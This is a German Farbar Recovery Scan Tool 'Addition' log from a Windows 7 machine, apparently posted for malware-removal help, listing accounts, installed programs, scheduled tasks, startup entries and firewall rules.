ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:23-09-2015 durchgeführt von Kenny G (2015-09-29 09:51:02) Gestartet von C:\Users\Kenny G\Downloads Windows 7 Ultimate Service Pack 1 (X64) (2013-10-01 16:18:55) Start-Modus: Normal ========================================================== ==================== Konten: ============================= Administrator (S-1-5-21-682121585-3582832733-1082443493-500 - Administrator - Disabled) eLoot (S-1-5-21-682121585-3582832733-1082443493-1008 - Administrator - Enabled) => C:\Users\eLoot Gast (S-1-5-21-682121585-3582832733-1082443493-501 - Limited - Disabled) HomeGroupUser$ (S-1-5-21-682121585-3582832733-1082443493-1002 - Limited - Enabled) Kenny G (S-1-5-21-682121585-3582832733-1082443493-1000 - Administrator - Enabled) => C:\Users\Kenny G Tabea Studium (S-1-5-21-682121585-3582832733-1082443493-1009 - Limited - Enabled) => C:\Users\Tabea Studium UpdatusUser (S-1-5-21-682121585-3582832733-1082443493-1007 - Limited - Enabled) => C:\Users\UpdatusUser ==================== Sicherheits-Center ======================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.) AV: AVG Internet Security 2015 (Enabled - Up to date) {4D41356F-32AD-7C42-C820-63775EE4F413} AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46} AS: AVG Internet Security 2015 (Enabled - Up to date) {F620D48B-1497-73CC-F290-58052563BEAE} FW: AVG Internet Security 2015 (Enabled) {757AB44A-78C2-7D1A-E37F-CA42A037B368} ==================== Installierte Programme ====================== (Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.) 888poker (HKLM-x32\...\888poker) (Version: - ) aborange Crypter - Deinstallation (HKLM-x32\...\aborange Crypter_is1) (Version: 3.10 - Mathias Gerlach [aborange.de]) Adobe Flash Player 18 ActiveX (HKLM-x32\...\Adobe Flash Player ActiveX) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated) Adobe Reader XI (11.0.12) - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AB0000000001}) (Version: 11.0.12 - Adobe Systems Incorporated) Apple Application Support (HKLM-x32\...\{46F044A5-CE8B-4196-984E-5BD6525E361D}) (Version: 2.3.6 - Apple Inc.) Apple Mobile Device Support (HKLM\...\{2EF5D87E-B7BD-458F-8428-E4D0B8B4E65C}) (Version: 7.0.0.117 - Apple Inc.) Auslogics DiskDefrag (HKLM-x32\...\{DF6A13C0-77DF-41FE-BD05-6D5201EB0CE7}_is1) (Version: 4.4.2.0 - Auslogics Labs Pty Ltd) AVG 2015 (HKLM\...\AVG) (Version: 2015.0.6140 - AVG Technologies) AVG 2015 (Version: 15.0.4435 - AVG Technologies) Hidden AVG 2015 (Version: 15.0.6140 - AVG Technologies) Hidden AVG Web TuneUp (HKLM-x32\...\AVG Web TuneUp) (Version: 4.1.6.294 - AVG Technologies) Battle.net (HKLM-x32\...\Battle.net) (Version: - Blizzard Entertainment) Battlefield: Bad Company 2 (HKLM-x32\...\Steam App 24960) (Version: - DICE) Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.) CCleaner (HKLM\...\CCleaner) (Version: 4.06 - Piriform) CDBurnerXP (HKLM-x32\...\{7E265513-8CDA-4631-B696-F40D983F3B07}_is1) (Version: 4.5.5.5571 - CDBurnerXP) Cliqz (HKLM-x32\...\{5A0C0737-6AFE-4DC6-A8B4-6DFE509ACD75}_is1) (Version: 0.5.31 - Cliqz.com) Counter-Strike (HKLM-x32\...\Steam App 10) (Version: - Valve) Counter-Strike: Source (HKLM-x32\...\Steam App 240) (Version: - Valve) CyberGhost 5 (HKLM\...\CyberGhost 5_is1) (Version: - CyberGhost S.R.L.) DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.1.0.0074 - Disc Soft Ltd) Free Alarm Clock 3.1.0 (HKLM-x32\...\{8ED5A2F1-338F-4608-8AF7-BCD1ADC1E1F7}_is1) (Version: 3.1 - Comfort Software Group) Free YouTube Download version 3.2.61.805 (HKLM-x32\...\Free YouTube Download_is1) (Version: 3.2.61.805 - DVDVideoSoft Ltd.) Free YouTube to MP3 Converter version 3.12.61.805 (HKLM-x32\...\Free YouTube to MP3 Converter_is1) (Version: 3.12.61.805 - DVDVideoSoft Ltd.) GIMP 2.8.10 (HKLM\...\GIMP-2_is1) (Version: 2.8.10 - The GIMP Team) Google Chrome (HKLM-x32\...\Google Chrome) (Version: 45.0.2454.101 - Google Inc.) Google Update Helper (x32 Version: 1.3.25.11 - Google Inc.) Hidden Google Update Helper (x32 Version: 1.3.28.15 - Google Inc.) Hidden Hearthstone (HKLM-x32\...\Hearthstone) (Version: - Blizzard Entertainment) ICQ 8.2 (build 6901) (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\ICQ) (Version: 8.2.6901.0 - ICQ) iTunes (HKLM\...\{A535111D-95C8-487F-869E-CE4C239972D2}) (Version: 11.1.1.11 - Apple Inc.) Java 7 Update 45 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217021FF}) (Version: 7.0.450 - Oracle) JetBoost (HKLM-x32\...\JetBoost_is1) (Version: 2.0.0 - BlueSprig) League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games ) League of Legends (x32 Version: 3.0.1 - Riot Games ) Hidden LibreOffice 4.2.2.1 (HKLM-x32\...\{0ECDB550-79ED-4E9E-851B-19A8B2B4EBFA}) (Version: 4.2.2.1 - The Document Foundation) Malwarebytes Anti-Malware Version 2.1.8.1057 (HKLM-x32\...\Malwarebytes Anti-Malware_is1) (Version: 2.1.8.1057 - Malwarebytes Corporation) Microsoft .NET Framework 4 Client Profile (HKLM\...\Microsoft .NET Framework 4 Client Profile) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Client Profile DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Client Profile DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended (HKLM\...\Microsoft .NET Framework 4 Extended) (Version: 4.0.30319 - Microsoft Corporation) Microsoft .NET Framework 4 Extended DEU Language Pack (HKLM\...\Microsoft .NET Framework 4 Extended DEU Language Pack) (Version: 4.0.30319 - Microsoft Corporation) Microsoft Office Enterprise 2007 (HKLM-x32\...\ENTERPRISE) (Version: 12.0.4518.1014 - Microsoft Corporation) Microsoft Silverlight (HKLM\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.40728.0 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation) Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation) Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation) Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.21005 (HKLM-x32\...\{7f51bdb9-ee21-49ee-94d6-90afc321780e}) (Version: 12.0.21005.1 - Microsoft Corporation) Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.21005 (HKLM-x32\...\{ce085a78-074e-4823-8dc1-8a721b94b76d}) (Version: 12.0.21005.1 - Microsoft Corporation) Mozilla Firefox 41.0 (x86 de) (HKLM-x32\...\Mozilla Firefox 41.0 (x86 de)) (Version: 41.0 - Mozilla) Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 41.0.0.5738 - Mozilla) Mozilla Thunderbird 24.6.0 (x86 de) (HKLM-x32\...\Mozilla Thunderbird 24.6.0 (x86 de)) (Version: 24.6.0 - Mozilla) Native Instruments Audio 2 DJ Driver (HKLM-x32\...\Native Instruments Audio 2 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 4 DJ Driver (HKLM-x32\...\Native Instruments Audio 4 DJ Driver) (Version: - Native Instruments) Native Instruments Audio 8 DJ Driver (HKLM-x32\...\Native Instruments Audio 8 DJ Driver) (Version: - Native Instruments) Native Instruments Controller Editor (HKLM-x32\...\Native Instruments Controller Editor) (Version: 1.8.2.281 - Native Instruments) Native Instruments Service Center (HKLM-x32\...\Native Instruments Service Center) (Version: 2.6.0.137 - Native Instruments) Native Instruments Traktor (HKLM-x32\...\Native Instruments Traktor) (Version: - Native Instruments) Native Instruments Traktor 2 (HKLM-x32\...\Native Instruments Traktor 2) (Version: 2.9.0.1257 - Native Instruments) Native Instruments Traktor Audio 2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Audio 2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Audio 6 Driver (HKLM-x32\...\Native Instruments Traktor Audio 6 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol D2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol D2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol F1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol F1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S2 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S2 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S4 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S4 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol S8 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol S8 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol X1 MK2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol X1 MK2 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z1 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z1 Driver) (Version: - Native Instruments) Native Instruments Traktor Kontrol Z2 Driver (HKLM-x32\...\Native Instruments Traktor Kontrol Z2 Driver) (Version: - Native Instruments) NVIDIA 3D Vision Controller-Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 331.65 - NVIDIA Corporation) NVIDIA 3D Vision Treiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 331.65 - NVIDIA Corporation) NVIDIA Grafiktreiber 331.65 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 331.65 - NVIDIA Corporation) NVIDIA PhysX-Systemsoftware 9.13.0725 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.13.0725 - NVIDIA Corporation) NVIDIA Virtual Audio 1.2.9 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_VirtualAudio.Driver) (Version: 1.2.9 - NVIDIA Corporation) Opera Stable 32.0.1948.25 (HKLM-x32\...\Opera 32.0.1948.25) (Version: 32.0.1948.25 - Opera Software) Pidgin (HKLM-x32\...\Pidgin) (Version: 2.10.7 - ) pidgin-otr 4.0.0-1 (HKLM-x32\...\pidgin-otr) (Version: 4.0.0-1 - Cypherpunks CA) Poker 770 (HKLM-x32\...\Poker 770) (Version: - ) PokerStars.eu (HKLM-x32\...\PokerStars.eu) (Version: - PokerStars.eu) Project 64 version 2.1.0.1 (HKLM-x32\...\Project 64_is1) (Version: 2.1.0.1 - ) SHIELD Streaming (Version: 1.6.34 - NVIDIA Corporation) Hidden Skype™ 6.11 (HKLM-x32\...\{4E76FF7E-AEBA-4C87-B788-CD47E5425B9D}) (Version: 6.11.102 - Skype Technologies S.A.) SleepTimer Ultimate 1.2 (HKLM-x32\...\{0EE56463-49B2-45E1-B74F-3E0139DBC986}_is1) (Version: - Christian Handorf) Sony Mobile Update Engine (HKLM-x32\...\Update Engine) (Version: 2.13.13.201311261136 - Sony Mobile Communications AB) Sony PC Companion 2.10.188 (HKLM-x32\...\{F09EF8F2-0976-42C1-8D9D-8DF78337C6E3}) (Version: 2.10.188 - Sony) Steam (HKLM-x32\...\{048298C9-A4D3-490B-9FF9-AB023A9238F3}) (Version: 1.0.0.0 - Valve Corporation) TAP-Windows 9.9.2 (HKLM\...\TAP-Windows) (Version: 9.9.2 - ) TeamSpeak 3 Client (HKLM-x32\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH) TrackMania United (HKLM-x32\...\Steam App 7200) (Version: - Nadeo) TrueCrypt (HKLM-x32\...\TrueCrypt) (Version: 7.1a - TrueCrypt Foundation) Visual Studio 2012 x64 Redistributables (HKLM\...\{8C775E70-A791-4DA8-BCC3-6AB7136F4484}) (Version: 14.0.0.1 - AVG Technologies) Visual Studio 2012 x86 Redistributables (HKLM-x32\...\{98EFF19A-30AB-4E4B-B943-F06B1C63EBF8}) (Version: 14.0.0.1 - AVG Technologies CZ, s.r.o.) VLC media player 2.1.0 (HKLM-x32\...\VLC media player) (Version: 2.1.0 - VideoLAN) VNC Viewer 5.1.0 (HKLM\...\{8F29CFF4-4A54-4C34-8905-B74527DE93C8}) (Version: 5.1.0 - RealVNC Ltd) Web Companion (HKLM-x32\...\{99640eec-4d74-4df5-95f4-719dc27de6a8}) (Version: 2.0.1025.2130 - Lavasoft) Webocton - Scriptly 0.8.95.6 (HKLM-x32\...\Webocton - Scriptly_is1) (Version: 0.8.95.6 - Webocton) William Hill Poker (HKLM-x32\...\William Hill Poker) (Version: - ) WinRAR 5.01 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.01.0 - win.rar GmbH) World of Warcraft (HKLM-x32\...\World of Warcraft) (Version: - Blizzard Entertainment) Wuala (HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\Wuala) (Version: 1.0.444.0 - LaCie) Wuala CBFS (HKLM-x32\...\Wuala CBFS) (Version: 3.2.107.0 - LaCie) Wuala OverlayIcons (HKLM-x32\...\Wuala OverlayIcons) (Version: 1.0.0.2 - LaCie) Xilisoft iPhone Magic (HKLM-x32\...\Xilisoft iPhone Magic) (Version: 5.7.5.20150727 - Xilisoft) ==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ========================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) ==================== Wiederherstellungspunkte ========================= 23-09-2015 06:34:58 Windows 7 Service Pack 1 27-09-2015 20:53:18 Windows Update 28-09-2015 23:02:53 Installed Microsoft Office Enterprise 2007 ==================== Hosts Inhalt: =============================== (Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.) 2009-07-14 04:34 - 2015-09-21 18:32 - 00000027 ____A C:\Windows\system32\Drivers\etc\hosts 127.0.0.1 localhost ==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) Task: {0D1A705F-BC57-4C56-9001-41F179ED8A24} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-09-19] (Piriform Ltd) Task: {2C62D752-B42F-4EBB-9A9B-8F3648694368} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe [2015-08-13] (Adobe Systems Incorporated) Task: {2D33A450-57FF-4A00-AE28-E87E56431EBE} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {4E8F7D37-0852-4EDC-861C-E3D03ECBABA7} - System32\Tasks\Opera scheduled Autoupdate 1438940281 => C:\Program Files (x86)\Opera\launcher.exe [2015-09-11] (Opera Software) Task: {69CAC2C9-9E20-47E3-9AAC-5005640B912E} - System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {6D06CB31-009E-45FA-A9FE-85EEEF758F7C} - System32\Tasks\Adobe Reader and Acrobat Manager => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2014-12-19] (Adobe Systems Incorporated) Task: {6D47D039-18B5-44B4-8059-2A192F7A2F7E} - System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {80ACD03E-D8E8-47EB-B041-F165F30E230D} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {9200AA28-5EB6-4EAD-BF4E-CDF0410B5CF9} - System32\Tasks\{A3BB51D3-1E67-46C5-8ED5-8734DECD6918} => Chrome.exe hxxp://www.skype.com/go/downloading?source=lightinstaller&ver=5.3.0.111.261&LastError=404 Task: {A23C2641-27E1-4303-8187-0DBF0233649C} - System32\Tasks\JetBoost_AutoUpdate => C:\Program Files (x86)\BlueSprig\JetBoost\AutoUpdate.exe [2012-11-27] (BlueSprig) Task: {B304FCBA-F8AD-455F-95F7-BBA64D8987AB} - System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {B4A8F9FA-04C0-40CF-95EB-AE47E2BB4073} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe Task: {C1019F60-C40C-40F9-99E0-A20254841B65} - System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441} => pcalua.exe -a "C:\Users\Kenny G\Desktop\bewerbung\bitdefender_isecurity.exe" -d "C:\Users\Kenny G\Desktop\bewerbung" Task: {C4EDDEAE-BCF6-49B9-A64D-CACA20F51E9E} - System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {C7A41BF4-00C0-4FC0-A9C1-22B5B9F7ACC5} - System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{0FBD9ABF-7DA0-463E-A7DC-A394052CC9A8}\Setup.exe" -c -runfromtemp -l0x0407 -removeonly Task: {CB8F7966-49EF-42D7-B59C-81E070B86191} - System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) Task: {EFCA144A-E45A-4877-8FAD-E51248235D56} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-30] (Google Inc.) (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.) Task: C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_18_0_0_232_pepper.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe ==================== Geladene Module (Nicht auf der Ausnahmeliste) ============== 2015-06-02 09:01 - 2015-08-26 11:33 - 01205136 _____ () C:\Program Files (x86)\AVG Web TuneUp\WtuSystemSupport.exe 2013-11-03 19:09 - 2013-10-23 10:20 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll 2014-01-15 20:58 - 2014-01-15 21:16 - 00076888 _____ () C:\Windows\SysWOW64\PnkBstrA.exe 2013-09-13 19:51 - 2013-09-13 19:51 - 00087952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\zlib1.dll 2013-09-13 19:51 - 2013-09-13 19:51 - 01242952 _____ () C:\Program Files (x86)\Common Files\Apple\Apple Application Support\libxml2.dll ==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) ========= (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.) AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_12.1_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\Photoshop_Portable_13.1.2_x64_Multilingual.exe:BDU AlternateDataStreams: C:\Users\eLoot\Downloads\torbrowser-install-3.5.2_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\HiJackThis204.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\jetboost-setup-2.0.0.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupCasino_aad73b_de.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\SetupPoker_5fabb7.exe:BDU AlternateDataStreams: C:\Users\Kenny G\Downloads\TitanBSetup_5c0cd5.exe:BDU AlternateDataStreams: C:\Users\Tabea Studium\Downloads\Shockwave_Installer_Slim.exe:BDU ==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) =================== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.) ==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.) ==================== Internet Explorer Vertrauenswürdig/Eingeschränkt =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.) IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\localhost -> localhost IE trusted site: HKU\S-1-5-21-682121585-3582832733-1082443493-1000\...\webcompanion.com -> hxxp://webcompanion.com ==================== Andere Bereiche ============================ (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) HKU\S-1-5-21-682121585-3582832733-1082443493-1000\Control Panel\Desktop\\Wallpaper -> DNS Servers: 192.168.2.1 HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1) Windows Firewall ist aktiviert. ==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge == (Aktuell gibt es keinen automatisierten Fix für diesen Bereich.) MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^McAfee Security Scan Plus.lnk => C:\Windows\pss\McAfee Security Scan Plus.lnk.CommonStartup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk => C:\Windows\pss\Dropbox.lnk.Startup MSCONFIG\startupfolder: C:^Users^Kenny G^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MyPC Backup.lnk => C:\Windows\pss\MyPC Backup.lnk.Startup MSCONFIG\startupreg: APSDaemon => "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe" MSCONFIG\startupreg: Bdagent => "C:\Program Files\Bitdefender\Bitdefender 2015\bdagent.exe" MSCONFIG\startupreg: Bitdefender-Geldb�rse => MSCONFIG\startupreg: Bitdefender-Geldb�rse-Anwendungs-Agent => MSCONFIG\startupreg: CyberGhost => "C:\Program Files\CyberGhost 5\CyberGhost.exe" /autostart /min MSCONFIG\startupreg: FreeAC => C:\Program Files (x86)\FreeAlarmClock\FreeAlarmClock.exe -autorun MSCONFIG\startupreg: GoogleChromeAutoLaunch_9CD6D292798361639A68D2D1D9501714 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window MSCONFIG\startupreg: icq => C:\Users\Kenny G\AppData\Roaming\ICQM\icq.exe -CU MSCONFIG\startupreg: InstallerLauncher => "C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\setuplauncher.exe" /run:"C:\Program Files\Common Files\Bitdefender\SetupInformation\{6F57816A-791A-4159-A75F-CFD0C7EA4FBF}\Installer.exe" MSCONFIG\startupreg: iTunesHelper => "C:\Program Files (x86)\iTunes\iTunesHelper.exe" MSCONFIG\startupreg: mobilegeni daemon => C:\Program Files (x86)\Mobogenie\DaemonProcess.exe MSCONFIG\startupreg: Optimizer Pro => C:\Program Files (x86)\Optimizer Pro\OptProLauncher.exe MSCONFIG\startupreg: Sony PC Companion => "C:\Program Files (x86)\Sony\Sony PC Companion\PCCompanion.exe" /Background MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent MSCONFIG\startupreg: SunJavaUpdateSched => "C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe" MSCONFIG\startupreg: vProt => "C:\Program Files (x86)\AVG Web TuneUp\vprot.exe" ==================== Firewall Regeln (Nicht auf der Ausnahmeliste) =============== (Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.) FirewallRules: [{F1E8D03D-FFA2-42DD-A766-22ABE0AD0436}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe FirewallRules: [{A0A07BA7-2135-482B-8CF0-7D59DA237E7B}] => (Allow) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\WebKit2WebProcess.exe FirewallRules: [{15629829-3DD3-4A81-B20D-4255F55023B9}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{51D8DA04-F385-4088-8779-22A2C6969D59}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe FirewallRules: [{1CD2F4D1-8114-4FBA-9D7E-4BFC8959B015}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{1B40452A-2002-47A8-B02E-49C07A677A04}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe FirewallRules: [{B6489A7B-4235-4D96-99A9-EEDD6A2FE8BD}] => (Allow) C:\Program Files (x86)\iTunes\iTunes.exe FirewallRules: [{720D02FF-52F6-4154-A621-5AB2A3DB03A3}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{C7AF308F-8BD1-41D4-A681-37A1C88C993A}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe FirewallRules: [{10736636-FB53-42C9-A3F4-529BAFEF521E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe 